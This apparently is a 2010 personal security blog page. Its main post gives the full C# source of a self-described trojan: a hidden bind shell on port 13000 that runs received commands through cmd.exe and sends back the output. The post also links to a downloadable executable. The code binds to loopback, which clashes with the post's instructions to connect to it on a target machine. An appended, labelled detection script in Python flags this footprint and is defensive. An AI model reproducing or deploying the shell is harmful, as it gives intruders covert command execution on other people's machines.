Thursday, May 20, 2010

Automatic SQL injection tool update

Hi folks! This is an update about the automatic SQL injection tool I started developing.
My first intention was to develop a simple automatic injection tool, but once I started developing it I found it to be far from simple. That is why I decided to join forces with my colleague Raviv Raz, who previously developed Multinjector. We intend to greatly improve and extend its functionality. You can read all about it at Raviv's blog. Updates and code reviews will be posted by me later on.

Have a good weekend,
-Herzel

Saturday, May 1, 2010

My own C# trojan - remote shell command execution

In this post I will present a simple "shell" I created using C#/.NET.
The trojan runs in the background, opens a listening port on the machine running it and allows any connected client to execute remote shell commands.
This application is for educational purposes only (mostly my own).

How to use it?

Simply run the trojan on the target machine and connect to it on port 13000 using telnet or netcat. After the connection has been established, you may execute any shell command on the target machine:

code:
[STAThread]
static void Main()
{
    ProcessStartInfo processInfo;
    Process process;
    TcpListener server = null;
    bool isFirst = true;

    try
    {
        // Set the TcpListener on port 13000.
        Int32 port = 13000;
        // Bind to the loopback address, so the listener is reachable only from the local machine.
        IPAddress localAddr = IPAddress.Parse("127.0.0.1");
        server = new TcpListener(localAddr, port);
        // Start listening for client requests.
        server.Start();
        // Buffer for reading data
        Byte[] bytes = new Byte[256];
        String command = null;
        int i;
        string recv_char;
        byte[] msg;
        // Perform a blocking call to accept a single client.
        TcpClient client = server.AcceptTcpClient();
        // Get a stream object for reading and writing
        NetworkStream stream = client.GetStream();
        // Say hello
        msg = System.Text.Encoding.ASCII.GetBytes("Welcome Master! enter a command to execute or enter exit:\r\n");
        stream.Write(msg, 0, msg.Length);

        // Enter the command loop.
        while (true)
        {
            if (!isFirst)
            {
                msg = System.Text.Encoding.ASCII.GetBytes("Enter a command:\r\n");
                stream.Write(msg, 0, msg.Length);
            }
            // Reset the command
            command = null;

            // Read until a newline arrives (Read returns 0 when the client disconnects).
            while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
            {
                // Translate the received bytes to an ASCII string and append them to the command.
                recv_char = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
                command += recv_char;
                if (command.Contains("\n"))
                    break;
            }
            if (command.Equals("exit\r\n"))
            {
                // If "exit" was entered, say goodbye and end the connection
                msg = System.Text.Encoding.ASCII.GetBytes("Bye Bye Master...\r\n");
                stream.Write(msg, 0, msg.Length);
                client.Close();
                break;
            }
            // Execute the received command through cmd.exe (/C terminates cmd.exe after the command finishes):
            processInfo = new ProcessStartInfo("cmd.exe", "/C " + command);
            processInfo.CreateNoWindow = true;         // don't open a console window
            processInfo.RedirectStandardOutput = true; // capture the command's output instead of printing it
            processInfo.UseShellExecute = false;       // required for output redirection
            process = Process.Start(processInfo);      // start the process
            string output = process.StandardOutput.ReadToEnd();
            process.Close(); // release the process handle
            isFirst = false;
            if (output != null)
            {
                msg = System.Text.Encoding.ASCII.GetBytes(output + "\n");
                // Send the command output back to the client.
                stream.Write(msg, 0, msg.Length);
            }
            else
            {
                msg = System.Text.Encoding.ASCII.GetBytes("Sorry Master, command execution failed\r\n");
                // Send back an error response.
                stream.Write(msg, 0, msg.Length);
            }
        }
    }
    catch
    {
        // do nothing
    }
    finally
    {
        // Stop listening for new clients.
        server.Stop();
    }
}
You may download the executable file from here.
Oh, and don't forget to kill that process when you finish playing with it :)

-herzel
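As an added defender-side example (not part of the original post), the Python below correlates process-creation records with a listener inventory to flag the footprint this shell leaves on a host: one process that owns a TCP listener and repeatedly spawns "cmd.exe /C" children. The PIDs, paths, port rows and event shapes are constructed sample data, not output from the tool above.

```python
# Added detection example (not part of the original post): flag a process that both
# holds a TCP listener and spawns "cmd.exe /C" children, the footprint of the shell above.

# Constructed sample in the shape of Windows Security 4688 process-creation records.
PROC_EVENTS = [
    {"pid": 4120, "ppid": 1880, "image": r"C:\Users\demo\trojan.exe", "cmdline": "trojan.exe"},
    {"pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /C dir"},
    {"pid": 4201, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /C whoami"},
    {"pid": 5002, "ppid": 1880, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 3001, "ppid": 2200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /C build.bat"},
]

# Constructed sample in the shape of "netstat -ano" listener rows: (proto, local address, pid).
LISTENERS = [
    ("TCP", "127.0.0.1:13000", 4120),
    ("TCP", "0.0.0.0:445", 4),
    ("TCP", "0.0.0.0:135", 900),
]


def listener_ports_by_pid(listeners):
    """Map each PID that owns a TCP listener to the set of local ports it listens on."""
    ports = {}
    for proto, local, pid in listeners:
        if proto.upper() == "TCP":
            ports.setdefault(pid, set()).add(int(local.rsplit(":", 1)[1]))
    return ports


def find_bind_shell_parents(events, listeners, min_children=1):
    """Return {parent_pid: {"image", "ports", "commands"}} for every parent that owns a
    TCP listener and launched at least min_children "cmd.exe /C" children."""
    ports = listener_ports_by_pid(listeners)
    images = {ev["pid"]: ev["image"] for ev in events}
    hits = {}
    for ev in events:
        if not ev["image"].lower().endswith("\\cmd.exe"):
            continue
        if "/c " not in ev["cmdline"].lower():   # /C: one-shot command, as the shell above uses
            continue
        if ev["ppid"] not in ports:              # parent holds no listening socket: ordinary console use
            continue
        hit = hits.setdefault(ev["ppid"], {"image": images.get(ev["ppid"], "?"),
                                            "ports": sorted(ports[ev["ppid"]]), "commands": []})
        hit["commands"].append(ev["cmdline"])
    return {pid: h for pid, h in hits.items() if len(h["commands"]) >= min_children}


if __name__ == "__main__":
    for pid, hit in find_bind_shell_parents(PROC_EVENTS, LISTENERS).items():
        print(f"pid {pid} {hit['image']} listens on {hit['ports']} and ran: {hit['commands']}")
```

On a real host the two inputs come from the Security event log (event 4688 with command-line auditing enabled) and from netstat -ano or Get-NetTCPConnection, and a loopback-only listener like this one is still visible there.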